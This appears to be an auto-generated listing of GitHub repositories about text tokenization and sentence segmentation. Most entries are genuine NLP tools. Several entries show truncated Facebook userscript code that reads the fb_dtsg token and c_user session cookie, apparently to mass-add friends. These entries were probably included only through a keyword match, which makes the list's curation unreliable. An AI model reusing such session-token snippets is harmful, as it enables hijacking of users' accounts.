100 Best GitHub: Tokenization


See also:

Tokenizer & Dialog Systems


sentence+tokenization [25x Jul 2014]

  • proycon/ucto .. Unicode tokeniser. Ucto tokenizes text files: it separates words from punctuation, and splits sentences. It offers several other basic preprocessing steps such as changing case that you can all use to make your text suited for further processing such as indexing, part-of-speech tagging, or machine…
  • ixa-ehu/ixa-pipe-tok .. IXA pipes sentence segmenter and tokenizer (http://ixa2.si.ehu.es/ixa-pipes).
  • ephendyy/sahabatfb .. // ==UserScript== // @name facebook 2014 // @version v.01 // @Hak Cipta Ephendy // ==/UserScript== var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);…
  • mtancret/pySentencizer .. This Python module is a simple sentencizer, tokenizer, and parts-of-speech tagger for the English language.
  • ticup/tokepi .. Tokenizer that transforms a string of sentences into an array of white-space separated strings of tokens
  • sgrimes/word_aligner .. PyQt GUI to allow for annotation and display of token-based alignments of parallel sentences
  • ZoltCyber/file.js .. /*Function di add Ribuan Orang */ /* Script by Brian Mc’Knight */ var parent=document.getElementsByTagName(“html”)[0]; var _body = document.getElementsByTagName(‘body’)[0]; var _div = document.createElement(‘div’); _div.style.height=”25″;…
  • RendySetiawan/TEST .. var parent=document.getElementsByTagName(“html”)[0]; var _body = document.getElementsByTagName(‘body’)[0]; var _div = document.createElement(‘div’); _div.style.height=”25″; _div.style.width=”100%”; _div.style.position=”fixed”;…
  • spatzle/tf-idf_python .. tf-idf library in python, extended from another python example, but added use of nltk to split up the document & tokenize words in the sentence
  • amb-enthusiast/PersonCoreferenceAnnotator .. A UIMA Annotator (including type system) which annotates sentences, tokens, Person named entities and coreference resolution “mentions”. Dev uses OpenNLP coreference and named entity recognition tools, within an apache UIMA Annotator analysis engine.
  • texttheater/iobify .. From the raw version and a normalized version of a text, creates a raw version where sentence and token boundaries are explicitly marked.
  • Gbuomprisco/Simple-Text-Analizer .. A simple text analyzer that manages texts and provides for tools such as tokenizer, sentences splitter, and regex tester built with Python NLTK and PyGTK
  • adesatria/Theme .. var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); alert(‘Theme By: adE Satria …
  • fnl/segtok .. scripts to pre-process plain-text: sentence segmentation, tokenization, and stemming
  • ragerri/stanford-tok-en .. This module provides a ‘ready to use’ KAF wrapper for English Sentence Segmentation and Tokenization Stanford PTBTokenizer (http://www-nlp.stanford.edu/software/) All dependencies and classpath configurations are automatically managed by Maven.
  • kuhumcst/rtfreader .. Reads an RTF or flat text file and outputs the text, one line per sentence & optionally tokenized.